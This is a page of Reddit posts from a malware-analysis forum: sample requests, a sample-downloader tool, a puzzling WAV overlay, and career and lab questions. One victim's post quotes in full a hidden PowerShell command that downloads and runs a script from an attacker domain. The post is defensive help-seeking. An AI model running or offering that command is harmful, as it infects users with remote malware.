r/MalwareAnalysis

​Request: Need a copy of this malware sample for static analysis study

​Hi everyone,

​I'm currently looking into a specific EXE file for analysis/learning purposes, but I don't have a VirusTotal Enterprise or Premium account to download the source binary, ​The file doesn't seem to be available on public repositories.

​Could anyone with VirusTotal access please help me grab this sample?

​SHA256: 8ac97813f747229c0e09d898d6f82048bfabf698792731190ea39180d6c7cc96

VirusTotal Link: https://www.virustotal.com/gui/file-analysis/ZGU3MGIxOTBhZWJlNmM0NjE2NTg1NjIwN2EzODI4NGU6MTc4MzI3MTc1NA==

​Thanks in advance for the help!

reddit.com
u/AlarmLongjumping2563 — 8 hours ago

Obfuscated Minecraft Mod Installer .jar Ran on Arch Linux, Need Manual Malware Analysis

Willing to compensate for your time as well.

I have a heavily obfuscated .jar file that acts as an installer for a Minecraft mod. I already opened it on my Arch Linux PC, and I’m concerned that I may have infected my own device.

I do not have the actual mod .jar because I do not want to run the installer again and let it automatically install anything into my .minecraft folder.

I’m not looking for automated scanner results. I need someone experienced to determine whether the installer is malicious and explain what it does.

reddit.com
u/thrashingjohn — 4 days ago
▲ 12 r/MalwareAnalysis+1 crossposts

I built a small MalwareBazaar downloader for lab sample collection

Hi all,

I built a small Python tool for pulling MalwareBazaar samples into an isolated analysis / AV-testing lab, and Im sharing it in case its useful to other malware researchers or students setting up a safe workflow.

It supports:

- recent samples

- search by tag

- search by family / signature

- filtering by file type

- downloading the newest N matching samples

- CLI mode and a small desktop GUI

- Auth-Key setup and connectivity checks

Important safety note: the tool does not extract or execute anything. Samples are saved exactly as MalwareBazaar provides them, as password-protected ZIP files, intended to be moved into an isolated VM/lab environment. Do not use this on a normal host or outside a controlled malware-analysis setup.

GitHub:

https://github.com/greit0n/malwarebazaar-downloader

Id appreciate feedback on the workflow, missing filters, packaging, or anything that would make it more useful for safe lab use.

u/gorgono95 — 4 days ago

Weird Malware Artifact – Large File with Tiny WAV and Encrypted Overlay

Hey everyone,

I've been analyzing a malware sample that had a really strange structure, and I wanted to share it here in case anyone has seen something similar.


The Setup:

The original malware file was around 700 KB, which is fairly large. But when I started digging deeper, I realized that most of that size was just padding / junk data – the actual functional content was only about 28 KB.

Inside that 28 KB, I found a WAV file (RIFF header, ~28 KB, 1 second long, 8‑bit mono, 22050 Hz). The audio itself is just random noise – not music, not speech, nothing useful.


What I Found:

  1. The WAV file · Valid RIFF structure. · Plays static noise. · No hidden image in spectrogram. · No embedded files via binwalk.
  2. Strings analysis strings on the WAV shows: · Normal WAV headers (RIFF, WAVEfmt, data, etc.) · But also random short strings like: · CNtt · wUKw · U9TE · wwwwx · hdDU · USqa These don’t seem to be part of any standard format – they might be key fragments, obfuscation, or just noise.
  3. Overlay (appended data) · The PE file also had an overlay (~28–30 KB) at the end. · Extracted overlay is detected as raw data (not PE, ZIP, RIFF, etc.). · strings on the overlay gives only random garbage. · binwalk shows nothing.

What I’ve Tried:

· XOR decryption with potential keys found in strings: · HAMZ · MZ:l[ · MZtX*-1 · CNtt · sh]QD:40 · wiYNRfy → None produced readable output. · Base64 decoding → no success. · Spectrogram check → nothing visible. · binwalk → no hidden files. · Manual extraction of the internal PE (if any) → no valid PE found.


My Hypothesis:

· The original file is just a wrapper/dropper. · The WAV might be: · A decoy · A key container · An encrypted payload · The overlay might contain the real encrypted data. · The random strings might be parts of the key or anti‑analysis noise.


reddit.com
u/MMIO- — 5 days ago
▲ 3 r/MalwareAnalysis+2 crossposts

I fell for the CloudFlare Powershell command but am I ok?

Hi everyone,

I accidentally executed a malicious PowerShell command from a fake Cloudflare "verification" page earlier today. I know better, but I made a mistake. I disconnected the machine from the internet immediately and have been analyzing the logs to see if the malware executed.

I am hoping the infection was blocked by Windows security policy (WDAC/AppLocker) before it could actually run. I want a second opinion to be absolutely sure.

The Command: powershell -w h "iex(irm 'idverification-cdn.info/3ece245b0da134dc' -UseBasicParsing)"; exit

What I’ve found in Event Viewer (Microsoft-Windows-PowerShell/Operational):

  • Event ID 4104 shows the script downloading a ZIP and an EXE.
  • Event ID 4100 shows the attempt to run the unzipped file (Verification.exe).
  • The log explicitly states: "Error Message = This command cannot be run due to the error: An Application Control policy has blocked this file."

https://privatebin.net/?28aefb63a6ace993#Hwnk2rc8vzi1b1a1jhmy5dXqaVs9Qv2FerL3hcXJuEie

My Questions:

  1. Given that this error triggered at the point of executing the Verification.exe payload, is it safe to assume the "stealer" logic never initialized?
  2. Looking at the script block logs (I’ve pasted the key parts below), do these scripts contain any "stealing" logic, or are they purely loaders/droppers?
  3. Is there any way the "dropper" could have exfiltrated data before the block, or do these scripts require the payload to run to perform the theft?
reddit.com
u/Super-Mutly — 6 days ago
▲ 3 r/MalwareAnalysis+1 crossposts

From Malware Analysis to Bug Bounty

https://preview.redd.it/fweexmzjs0ah1.png?width=683&format=png&auto=webp&s=1214ed37b1fa1a6d4b9c6677dc22d57559a96163

It's a fake account on Reddit but I really need your help, I didn't move from Malware Analysis but It for finding online jobs and investing my skills in web pentesting which allowing me to return again to Bug Bounty, If a team here need someone can do reverse engineering, malware analysis, basic exploit dev, web pentesting, also threat hunting on email detection, ( I can learn more and more because I love this field ), DM me, if not, just write a comment to advice me, thanks.

https://www.linkedin.com/feed/update/urn:li:activity:7476975083496939521/

reddit.com
u/Sea_Alternative_4229 — 8 days ago

Malware analysis lab on Macbook

Hello, I am very newbie in the topic so Im sorry if thats common knowledge... Im planning to buy m4 or m5 for both running local llms and malware analysis. Since most malwares are windows based does using mac architecture for running vm's will cause me more trouble than malware itself? Any answers are appreciated

reddit.com
u/sea-_ — 12 days ago